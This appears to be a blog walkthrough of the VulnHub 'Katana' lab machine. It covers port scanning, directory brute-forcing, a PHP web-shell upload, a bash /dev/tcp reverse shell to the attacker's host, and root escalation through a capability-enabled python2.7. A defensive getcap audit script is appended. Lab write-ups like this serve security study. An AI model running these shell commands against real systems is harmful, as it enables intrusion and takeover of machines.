vulnhub-wp katana

🖳 host discovery

sudo netdiscover -r 192.168.213.0/24
Currently scanning: 192.168.213.0/24 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.213.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.213.2 00:50:56:ed:a6:8f 1 60 VMware, Inc.
192.168.213.129 00:0c:29:3f:3b:78 1 60 VMware, Inc.
192.168.213.254 00:50:56:e3:da:55 1 60 VMware, Inc.

The target was 192.168.213.129.

👁 service scan

nmap scan

nmap -p- -sV -sC -Pn -oN nmap --min-rate 8000 192.168.213.129
···
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 89:4f:3a:54:01:f8:dc:b6:6e:e0:78:fc:60:a6:de:35 (RSA)
| 256 dd:ac:cc:4e:43:81:6b:e3:2d:f3:12:a1:3e:4b:a3:22 (ECDSA)
|_ 256 cc:e6:25:c0:c6:11:9f:88:f6:c4:26:1e:de:fa:e9:8b (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Katana X
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
7080/tcp open ssl/http LiteSpeed httpd
| ssl-cert: Subject: commonName=katana/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-11T13:57:36
|_Not valid after: 2022-05-11T13:57:36
|_http-title: Katana X
| tls-alpn:
| h2
| spdy/3
| spdy/2
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: LiteSpeed
8088/tcp open http LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Katana X
8715/tcp open http nginx 1.14.2
|_http-title: 401 Authorization Required
|_http-server-header: nginx/1.14.2
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Restricted Content
MAC Address: 00:0C:29:3F:3B:78 (VMware)
Service Info: Host: KATANA; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-03-31T02:02:39
|_ start_date: N/A
|_nbstat: NetBIOS name: KATANA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: katana
| NetBIOS computer name: KATANA\x00
| Domain name: \x00
| FQDN: katana
|_ System time: 2024-03-30T22:02:39-04:00
···

There are lots of services, so let's try them one by one!

🚪🚶 get shell

21
Anonymous login is not allowed, so try other services.
22
We don't have credentials.
80
Brute-force paths:

gobuster dir -u http://192.168.213.129 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o 80.out -t 50
/.htm (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/. (Status: 200) [Size: 655]
/.htaccess (Status: 403) [Size: 279]
/.phtml (Status: 403) [Size: 279]
/ebook (Status: 301) [Size: 316] [--> http://192.168.213.129/ebook/]
/.htc (Status: 403) [Size: 279]
/.html_var_DE (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]

Nice, there is an /ebook path!
It is a bookstore CMS, and there are two ways to get a shell:

  • log in as admin, add a book, and upload a shell
  • use a public exploit
    Both fail. For the first, it seems we can't write files into the img path.
    The second fails too:
    python3 47887.py http://192.168.213.129/ebook
    /home/rightevil/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.18) or chardet (5.2.0)/charset_normalizer (2.0.12) doesn't match a supported version!
    warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
    > Attempting to upload PHP web shell...
    > Verifying shell upload...
    > Web shell failed to upload! The web server may not have write permissions.
    Try another port.

smb

smbclient -L //192.168.213.129      
Password for [WORKGROUP\rightevil]:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KATANA

Nothing useful, but we can use enum4linux to enumerate users (user: kanata).
7080
It's a rabbit hole: nothing there, every page was 403.
8088
Directory brute-force:

gobuster dir -u http://192.168.213.129:8088/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -t 50    
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.213.129:8088/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/cgi-bin/]
/css (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/css/]
/img (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/img/]
/docs (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/docs/]
/. (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/./]
/.htaccess (Status: 403) [Size: 1227]
/protected (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/protected/]
/blocked (Status: 301) [Size: 1260] [--> http://192.168.213.129:8088/blocked/]
Progress: 43007 / 43008 (100.00%)
===============================================================
Finished
===============================================================

The /docs path is the manual for OpenLiteSpeed Web Server 1.5, but I didn't find an exploit for it.
Let's search for pages with extensions:

gobuster dir -u http://192.168.213.129:8088/  -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt  -t 50


There is an upload.html.
After trying it, we can upload a PHP file, but it doesn't seem to show up on port 8088.

It is a web page too (because of /html), so let's try the other ports.
8715
It has a login prompt, and we can log in with admin:admin.
Our backdoor is served on this port!

Let's connect to it with weevely (I generated the backdoor with weevely).

If you want, you can spawn a reverse shell for a more stable session:

bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'

🛡️ PE

In /home/kanata we find kanata's password, and there is root's hash in /etc/passwd.
But kanata doesn't have sudo or anything else, and we couldn't crack root's hash.


Finally, linpeas.sh finds a file with capabilities set.

So we get a root shell:

/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
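As an added defensive check (not part of the original writeup): the escalation above works because the interpreter carries the setuid file capability, so an audit that parses `getcap -r /` output and flags root-equivalent capabilities, especially on interpreters, catches the misconfiguration before linpeas.sh does. Sample lines are constructed; both libcap output formats are handled.

```python
"""Audit `getcap -r /` output for file capabilities that amount to root."""
import re

# Effective or permitted on a binary any user can run, these let the caller
# become root (or read and write as root would).
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
}
# Interpreters are worse than ordinary binaries: any user can feed them code.
_INTERP = re.compile(r"^(python|perl|ruby|node|php|bash|sh)[\d.]*$")
# libcap < 2.41 prints "/path = cap_setuid+ep"; libcap >= 2.41 prints "/path cap_setuid=ep".
_OLD = re.compile(r"^(?P<path>\S+) = (?P<caps>.+)$")
_NEW = re.compile(r"^(?P<path>\S+) (?P<caps>\S+=.*)$")

def parse_getcap_line(line):
    """Return (path, {cap_name: flags}) for one getcap line, or None if it is not one."""
    m = _OLD.match(line.strip()) or _NEW.match(line.strip())
    if not m:
        return None
    caps = {}
    for clause in m.group("caps").split():
        # A clause is "cap_a,cap_b+ep" (old format) or "cap_a,cap_b=ep" (new format).
        parts = re.split(r"[+=]", clause, maxsplit=1)
        if len(parts) == 2:
            for name in parts[0].split(","):
                caps[name] = parts[1]
    return m.group("path"), caps

def audit(getcap_output):
    """Return sorted (path, reason) findings for root-equivalent capabilities."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        risky = sorted(c for c, f in caps.items()
                       if c in ROOT_EQUIVALENT and ("e" in f or "p" in f))
        if risky:
            kind = "interpreter" if _INTERP.match(path.rsplit("/", 1)[-1]) else "binary"
            findings.append((path, f"{kind} with {','.join(risky)}"))
    return sorted(findings)

# Constructed sample in both formats; the python2.7 line mirrors the Katana finding.
SAMPLE = """\
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/sbin/arping cap_net_raw=ep
"""
```

Feed `audit()` the real output of `getcap -r / 2>/dev/null` on a host; `cap_net_raw` on ping is expected and is not flagged, while `cap_setuid` on any interpreter is.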

📖 recommended articles

PE about file capabilities
PE about file capabilities in hacktricks
katana vulnhub download


vulnhub-wp katana
https://rightevil.github.io/vulnhub-wp-katana/
Author
rightevil
Published on
31 March 2024
License